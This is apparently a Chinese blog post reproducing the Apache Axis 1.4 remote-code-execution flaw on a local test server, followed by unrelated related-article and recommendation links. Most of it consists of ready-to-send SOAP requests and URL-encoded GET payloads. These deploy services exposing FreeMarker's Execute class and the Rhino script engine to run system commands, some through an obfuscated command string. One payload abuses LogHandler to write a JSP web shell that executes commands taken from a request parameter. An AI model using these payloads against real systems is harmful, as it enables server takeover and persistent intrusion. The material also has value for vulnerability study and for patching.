1、环境搭建

在idea 上新建项目,然后用tomcat运行即可

2、漏洞复现

2、1 freemarker.template.utility.Execute

如果项目里面没有freemarker 就添加,这里添加的是 freemarker-2.3.30.jar

  • 创建 freemarkerTest services ,返回Done processing 即表示创建成功,同时访问services页面也可以看到freemarkerTest services
POST /services/AdminService HTTP/1.1

Pragma: no-cache

Cache-Control: no-cache

sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"

sec-ch-ua-mobile: ?0

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Sec-Fetch-Site: same-origin

Sec-Fetch-Mode: navigate

Sec-Fetch-User: ?1

Sec-Fetch-Dest: document

Referer: http://localhost:8083/services

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Connection: close

SOAPAction:

Content-Type: text/xml;charset=UTF-8

Host: localhost:8083

Content-Length: 632

<?xml version="1.0" encoding="UTF-8"?>

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">

  <soapenv:Body>

    <deployment xmlns="http://xml.apache.org/axis/wsdd/"

                xmlns:java="http://xml.apache.org/axis/wsdd/providers/java">

       <service name="freemarkerTest" provider="java:RPC">

		<parameter name="className" value="freemarker.template.utility.Execute"/>

		<parameter name="allowedMethods" value="*"/>

       </service>

    </deployment>

  </soapenv:Body>

</soapenv:Envelope>
  • GET 创建service ,配合ssrf xxe 使用(当 "enableRemoteAdmin" 为 "false" )时
!--><deployment xmlns="http://xml.apache.org/axis/wsdd/"

                xmlns:java="http://xml.apache.org/axis/wsdd/providers/java">

       <service name="freemarkerTest" provider="java:RPC">

		<parameter name="className" value="freemarker.template.utility.Execute"/>

		<parameter name="allowedMethods" value="*"/>

       </service>

    </deployment

进行urlencode

%21%2d%2d%3e%3c%64%65%70%6c%6f%79%6d%65%6e%74%20%78%6d%6c%6e%73%3d%22%68%74%74%70%3a%2f%2f%78%6d%6c%2e%61%70%61%63%68%65%2e%6f%72%67%2f%61%78%69%73%2f%77%73%64%64%2f%22%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%78%6d%6c%6e%73%3a%6a%61%76%61%3d%22%68%74%74%70%3a%2f%2f%78%6d%6c%2e%61%70%61%63%68%65%2e%6f%72%67%2f%61%78%69%73%2f%77%73%64%64%2f%70%72%6f%76%69%64%65%72%73%2f%6a%61%76%61%22%3e%0a%20%20%20%20%20%20%20%3c%73%65%72%76%69%63%65%20%6e%61%6d%65%3d%22%66%72%65%65%6d%61%72%6b%65%72%54%65%73%74%22%20%70%72%6f%76%69%64%65%72%3d%22%6a%61%76%61%3a%52%50%43%22%3e%0a%09%09%3c%70%61%72%61%6d%65%74%65%72%20%6e%61%6d%65%3d%22%63%6c%61%73%73%4e%61%6d%65%22%20%76%61%6c%75%65%3d%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%2f%3e%0a%09%09%3c%70%61%72%61%6d%65%74%65%72%20%6e%61%6d%65%3d%22%61%6c%6c%6f%77%65%64%4d%65%74%68%6f%64%73%22%20%76%61%6c%75%65%3d%22%2a%22%2f%3e%0a%20%20%20%20%20%20%20%3c%2f%73%65%72%76%69%63%65%3e%0a%20%20%20%20%3c%2f%64%65%70%6c%6f%79%6d%65%6e%74

http://localhost:8083/services/AdminService?method= 将urlencode之后的值放在此处

  • 执行命令
POST /services/freemarkerTest HTTP/1.1

sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"

sec-ch-ua-mobile: ?0

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Sec-Fetch-Site: same-origin

Sec-Fetch-Mode: navigate

Sec-Fetch-User: ?1

Sec-Fetch-Dest: document

Referer: http://localhost:8083/services

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Connection: close

SOAPAction:

Content-Type: text/xml;charset=UTF-8

Host: localhost:8083

Content-Length: 671

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">

  <soapenv:Body>

    <exec soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">

      <arg0 href="#id0"/>

    </exec>

    <multiRef id="id0" soapenc:root="0" soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" soapenc:arrayType="xsd:anyType[1]" xsi:type="soapenc:Array" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">

      <multiRef xsi:type="soapenc:string">cmd.exe /c echo 111111</multiRef>

    </multiRef>

  </soapenv:Body>

</soapenv:Envelope>



<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:util="http://utility.template.freemarker" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">

   <soapenv:Header/>

   <soapenv:Body>

      <util:exec soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">

         <arguments>

            <string xsi:type="soapenc:string">cmd.exe /c whoami</string>

         </arguments>

      </util:exec>

   </soapenv:Body>

</soapenv:Envelope>

  • 卸载service
POST /services/AdminService HTTP/1.1

Pragma: no-cache

Cache-Control: no-cache

sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"

sec-ch-ua-mobile: ?0

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Sec-Fetch-Site: same-origin

Sec-Fetch-Mode: navigate

Sec-Fetch-User: ?1

Sec-Fetch-Dest: document

Referer: http://localhost:8083/services

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Connection: close

SOAPAction:

Content-Type: text/xml;charset=UTF-8

Host: localhost:8083

Content-Length: 395

<?xml version="1.0" encoding="UTF-8"?>

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">

  <soapenv:Body>

    <undeployment xmlns="http://xml.apache.org/axis/wsdd/">

      <service name="freemarkerTest"/>

    </undeployment>

  </soapenv:Body>

</soapenv:Envelope>


http://localhost:8083/services/AdminService?method=%21%2d%2d%3e%3c%75%6e%64%65%70%6c%6f%79%6d%65%6e%74%20%78%6d%6c%6e%73%3d%22%68%74%74%70%3a%2f%2f%78%6d%6c%2e%61%70%61%63%68%65%2e%6f%72%67%2f%61%78%69%73%2f%77%73%64%64%2f%22%3e%0a%20%20%20%20%20%20%3c%73%65%72%76%69%63%65%20%6e%61%6d%65%3d%22%66%72%65%65%6d%61%72%6b%65%72%54%65%73%74%22%2f%3e%0a%20%20%20%20%3c%2f%75%6e%64%65%70%6c%6f%79%6d%65%6e%74

2、2 com.sun.script.javascript.RhinoScriptEngine

jdk <= 1.7 可用 本地复现用的 jdk 1.7.0_79

  • 创建services
POST /services/AdminService HTTP/1.1

Pragma: no-cache

Cache-Control: no-cache

sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"

sec-ch-ua-mobile: ?0

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Sec-Fetch-Site: same-origin

Sec-Fetch-Mode: navigate

Sec-Fetch-User: ?1

Sec-Fetch-Dest: document

Referer: http://localhost:8083/services

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Connection: close

SOAPAction:

Content-Type: text/xml;charset=UTF-8

Host: localhost:8083

Content-Length: 1074

<?xml version="1.0" encoding="UTF-8"?>

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">

  <soapenv:Body>

    <deployment xmlns="http://xml.apache.org/axis/wsdd/"

                xmlns:java="http://xml.apache.org/axis/wsdd/providers/java">

       <service name="RhinoScriptEngineServiceTest" provider="java:RPC">

          <parameter name="className" value="com.sun.script.javascript.RhinoScriptEngine" />

          <parameter name="allowedMethods" value="eval" />

          <typeMapping deserializer="org.apache.axis.encoding.ser.BeanDeserializerFactory"

                     type="java:javax.script.SimpleScriptContext"

                     qname="ns:SimpleScriptContext"

                     serializer="org.apache.axis.encoding.ser.BeanSerializerFactory"

                     xmlns:ns="urn:beanservice" regenerateElement="false">

          </typeMapping>

      </service>

    </deployment>

  </soapenv:Body>

</soapenv:Envelope>
  • GET 创建service ,配合ssrf xxe 使用(当 "enableRemoteAdmin" 为 "false" )时
!--><deployment xmlns="http://xml.apache.org/axis/wsdd/"

                xmlns:java="http://xml.apache.org/axis/wsdd/providers/java">

       <service name="RhinoScriptEngineServiceTest" provider="java:RPC">

          <parameter name="className" value="com.sun.script.javascript.RhinoScriptEngine" />

          <parameter name="allowedMethods" value="eval" />

          <typeMapping deserializer="org.apache.axis.encoding.ser.BeanDeserializerFactory"

                     type="java:javax.script.SimpleScriptContext"

                     qname="ns:SimpleScriptContext"

                     serializer="org.apache.axis.encoding.ser.BeanSerializerFactory"

                     xmlns:ns="urn:beanservice" regenerateElement="false">

          </typeMapping>

      </service>

    </deployment

进行urlencode

http://localhost:8083/services/AdminService?method=%21%2d%2d%3e%3c%64%65%70%6c%6f%79%6d%65%6e%74%20%78%6d%6c%6e%73%3d%22%68%74%74%70%3a%2f%2f%78%6d%6c%2e%61%70%61%63%68%65%2e%6f%72%67%2f%61%78%69%73%2f%77%73%64%64%2f%22%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%78%6d%6c%6e%73%3a%6a%61%76%61%3d%22%68%74%74%70%3a%2f%2f%78%6d%6c%2e%61%70%61%63%68%65%2e%6f%72%67%2f%61%78%69%73%2f%77%73%64%64%2f%70%72%6f%76%69%64%65%72%73%2f%6a%61%76%61%22%3e%0a%20%20%20%20%20%20%20%3c%73%65%72%76%69%63%65%20%6e%61%6d%65%3d%22%52%68%69%6e%6f%53%63%72%69%70%74%45%6e%67%69%6e%65%53%65%72%76%69%63%65%54%65%73%74%22%20%70%72%6f%76%69%64%65%72%3d%22%6a%61%76%61%3a%52%50%43%22%3e%0a%20%20%20%20%20%20%20%20%20%20%3c%70%61%72%61%6d%65%74%65%72%20%6e%61%6d%65%3d%22%63%6c%61%73%73%4e%61%6d%65%22%20%76%61%6c%75%65%3d%22%63%6f%6d%2e%73%75%6e%2e%73%63%72%69%70%74%2e%6a%61%76%61%73%63%72%69%70%74%2e%52%68%69%6e%6f%53%63%72%69%70%74%45%6e%67%69%6e%65%22%20%2f%3e%0a%20%20%20%20%20%20%20%20%20%20%3c%70%61%72%61%6d%65%74%65%72%20%6e%61%6d%65%3d%22%61%6c%6c%6f%77%65%64%4d%65%74%68%6f%64%73%22%20%76%61%6c%75%65%3d%22%65%76%61%6c%22%20%2f%3e%0a%20%20%20%20%20%20%20%20%20%20%3c%74%79%70%65%4d%61%70%70%69%6e%67%20%64%65%73%65%72%69%61%6c%69%7a%65%72%3d%22%6f%72%67%2e%61%70%61%63%68%65%2e%61%78%69%73%2e%65%6e%63%6f%64%69%6e%67%2e%73%65%72%2e%42%65%61%6e%44%65%73%65%72%69%61%6c%69%7a%65%72%46%61%63%74%6f%72%79%22%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%74%79%70%65%3d%22%6a%61%76%61%3a%6a%61%76%61%78%2e%73%63%72%69%70%74%2e%53%69%6d%70%6c%65%53%63%72%69%70%74%43%6f%6e%74%65%78%74%22%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%71%6e%61%6d%65%3d%22%6e%73%3a%53%69%6d%70%6c%65%53%63%72%69%70%74%43%6f%6e%74%65%78%74%22%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%73%65%72%69%61%6c%69%7a%65%72%3d%22%6f%72%67%2e%61%70%61%63%68%65%2e%61%78%69%73%2e%65%6e%63%6f%64%69%6e%67%2e%73%65%72%2e%42%65%61%6e%53%65%72%69%61%6c%69%7a%65%72%46%61%63%74%6f%72%79%22%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%78%6d%6c%6e%73%3a%6e%73%3d%22%75%72%6e%3a%62%65%61%6e%73%65%72%76%69%63%65%22%20%72%65%67%65%6e%65%72%61%74%65%45%6c%65%6d%65%6e%74%3d%22%66%61%6c%73%65%22%3e%0a%20%20%20%20%20%20%20%20%20%20%3c%2f%74%79%70%65%4d%61%70%70%69%6e%67%3e%0a%20%20%20%20%20%20%3c%2f%73%65%72%76%69%63%65%3e%0a%20%20%20%20%3c%2f%64%65%70%6c%6f%79%6d%65%6e%74
  • 执行命令
<?xml version='1.0' encoding='UTF-8'?>

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:jav="http://javascript.script.sun.com">

  <soapenv:Body>

    <eval xmlns="http://localhost:8083/services/scriptEngine">

      <arg0 xmlns=""><![CDATA[function test(){var cmd1='c'; cmd1 += 'm';cmd1 += 'd';cmd1 += '.';cmd1 += 'e';   cmd1 += 'x';cmd1 += 'e';var cmd2 = '/'; cmd2 += 'c'; var pb = new java.lang.ProcessBuilder(cmd1,cmd2,'ver');var process = pb.start(); var ret = new java.util.Scanner(process.getInputStream()).useDelimiter('\\A').next();return ret;}test();]]>

      </arg0>

      <arg1 xmlns="" xsi:type="urn:SimpleScriptContext" xmlns:urn="urn:beanservice"></arg1>

    </eval>

  </soapenv:Body>

</soapenv:Envelope>
  • 卸载service
<?xml version="1.0" encoding="UTF-8"?>

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">

  <soapenv:Body>

    <undeployment xmlns="http://xml.apache.org/axis/wsdd/">

      <service name="RhinoScriptEngineServiceTest"/>

    </undeployment>

  </soapenv:Body>

</soapenv:Envelope>


http://localhost:8083/services/AdminService?method=%21%2d%2d%3e%3c%75%6e%64%65%70%6c%6f%79%6d%65%6e%74%20%78%6d%6c%6e%73%3d%22%68%74%74%70%3a%2f%2f%78%6d%6c%2e%61%70%61%63%68%65%2e%6f%72%67%2f%61%78%69%73%2f%77%73%64%64%2f%22%3e%0a%20%20%20%20%20%20%3c%73%65%72%76%69%63%65%20%6e%61%6d%65%3d%22%52%68%69%6e%6f%53%63%72%69%70%74%45%6e%67%69%6e%65%53%65%72%76%69%63%65%54%65%73%74%22%2f%3e%0a%20%20%20%20%3c%2f%75%6e%64%65%70%6c%6f%79%6d%65%6e%74

2、3 写文件

  • 创建service
<?xml version="1.0" encoding="UTF-8"?>

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">

  <soapenv:Body>

    <deployment xmlns="http://xml.apache.org/axis/wsdd/"

                xmlns:java="http://xml.apache.org/axis/wsdd/providers/java">

       <service name="writeFile2" provider="java:RPC">

		<requestFlow>

            <handler type="java:org.apache.axis.handlers.LogHandler" >

                <parameter name="LogHandler.fileName" value="F:/work/SpringStudy/out/artifacts/axis_rce_test_war_exploded/shell123.jsp" />

                <parameter name="LogHandler.writeToConsole" value="false" />

            </handler>

         </requestFlow>

          <parameter name="className" value="java.util.Random" />

          <parameter name="allowedMethods" value="*" />

       </service>

    </deployment>

  </soapenv:Body>

</soapenv:Envelope>
  • 写文件
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:util="http://util.java">

   <soapenv:Header/>

   <soapenv:Body>

      <util:ints soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">

         <in0 xsi:type="xsd:int" xs:type="type:int" xmlns:xs="http://www.w3.org/2000/XMLSchema-instance"><![CDATA[

<%@page import="java.util.*,java.io.*"%><% if (request.getParameter("c") != null) { Process p = Runtime.getRuntime().exec(request.getParameter("c")); DataInputStream dis = new DataInputStream(p.getInputStream()); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); }; p.destroy(); }%>

]]></in0>

         <in1 xsi:type="xsd:int" xs:type="type:int" xmlns:xs="http://www.w3.org/2000/XMLSchema-instance">?</in1>

      </util:ints>

   </soapenv:Body>

</soapenv:Envelope>

参考

Axis <=1.4 RCE 复现的更多相关文章

  1. 应用Apache Axis进行Web Service开发

    转自(http://tscjsj.blog.51cto.com/412451/84813) 一.概述 SOAP原意为Simple Object Access Protocol(简单对象访问协议),是一 ...

  2. 有理数的稠密性(The rational points are dense on the number axis.)

    每一个实数都能用有理数去逼近到任意精确的程度,这就是有理数的稠密性.The rational points are dense on the number axis.

  3. 使用axis开发web service服务端

    一.axis环境搭建 1.安装环境 JDK.Tomcat或Resin.eclipse等. 2.到 http://www.apache.org/dyn/closer.cgi/ws/axis/1_4下载A ...

  4. AXIS最佳实践

    前言: Axis是apache一个开源的webservice服务,需要web容器进行发布.本节主要用于介绍使用Axis开发webservice,包括服务端的创建.webservice的部署.客户端的调 ...

  5. axis 理解

    前言 使用numpy sum(a,axis=0)的时候,对axis参数比较费解,和直觉不太一样,故此记录 b = np.arange(12).reshape(3,4) b array([[ 0, 1, ...

  6. Axis 1 https(SSL) client 证书验证错误ValidatorException workaround

    Axis 1.x 编写的client在测试https的webservice的时候, 由于client 代码建立SSL连接的时候没有对truststore进行设置,在与https部署的webservic ...

  7. axis

    http://www.cnblogs.com/liyanblog/archive/2011/11/29/2266942.html 报错: D:\ws\la\WSofSMNS\WebRoot\WEB-I ...

  8. 【知识积累】服务器端获取客户端的IP地址(当客户端调用由Axis开发的WebService)

    一.前言 由于项目中一个小的模块需要获取客户端的IP地址以保证安全调用webservice接口,项目中客户端使用C#编写,服务器端使用Java编写,服务器端与客户端采用Axis开发的WebServic ...

  9. 使用axis调用WebService服务端

    由于项目中要调用其他公司的接口,研究了下axis调用webService这种方式,现将代码贴出,以备以后查阅: package com.xbq; import javax.xml.namespace. ...

  10. MATLAB axis和axes的区别

    axis中文为“轴”之意,在matlab中用于控制坐标轴的范围和样式(颜色等). axis([XMIN XMAX YMIN YMAX]) 设置当前所绘图像的x轴和y轴的范围.axis([XMIN XM ...

随机推荐

  1. .user.ini和.htaccess

    .user.ini .user.ini的使用条件 (1)nginx/apache/IIS,只要是以fastcgi运行的php都可以用这个方法 php配置访问级别 不同的php配置项根据其访问级别具有不 ...

  2. 【LeetCode】155. 最小栈

    155. 最小栈 知识点:栈:单调 题目描述 设计一个支持 push ,pop ,top 操作,并能在常数时间内检索到最小元素的栈. push(x) -- 将元素 x 推入栈中. pop() -- 删 ...

  3. 【LeetCode】316. 去除重复字母

    316. 去除重复字母 知识点:栈:单调 题目描述 给你一个字符串 s ,请你去除字符串中重复的字母,使得每个字母只出现一次.需保证 返回结果的字典序最小(要求不能打乱其他字符的相对位置). 示例 输 ...

  4. zzcms2020代码审计笔记

    在CNVD中看到zzcms后台sql注入漏洞: 漏洞细节未被公开,影响版本zzcms2020,本地搭建一套相同版本找一下漏洞触发点. 打开目录,后台ba***.php文件共有三个: 先看下bad.ph ...

  5. 【硬件模块】华为NBIOT 使用记录

    From: https://liudongdong1.github.io/ 1. background Low power wide area network (LPWAN) has become a ...

  6. docker-compose部署mysql,redis,rabbitmq

    version: '3' services: mysql: image: mysql:5.7.31 container_name: mysql restart: always command: --c ...

  7. C# 调用DOS 命令

    class NetWorkDeviceInfo { public static string GetDeviceInfo() { System.Diagnostics.Process p = new  ...

  8. Dos 获取网络的命令

    Netsh mbn 命令 https://docs.microsoft.com/zh-cn/windows-server/networking/technologies/netsh/netsh-mbn ...

  9. c# 对 struct为什么不能继承类和结构的思考

    1.类.结构在使用的时候可以不调用构造函数,如果能够继承类,这种情况下不能够初始化基类,因为不执行构造函数 2.结构.所有的结构类型都默认是 sealed,通过 反汇编可以看到  ,这就阻止了结构被继 ...

  10. 【springcloud】Eureka 常用配置解析

    转自:https://www.cnblogs.com/zyon/p/11023750.html 1. 配置项解析 1.1 通用配置 # 应用名称,将会显示在Eureka界面的应用名称列 spring. ...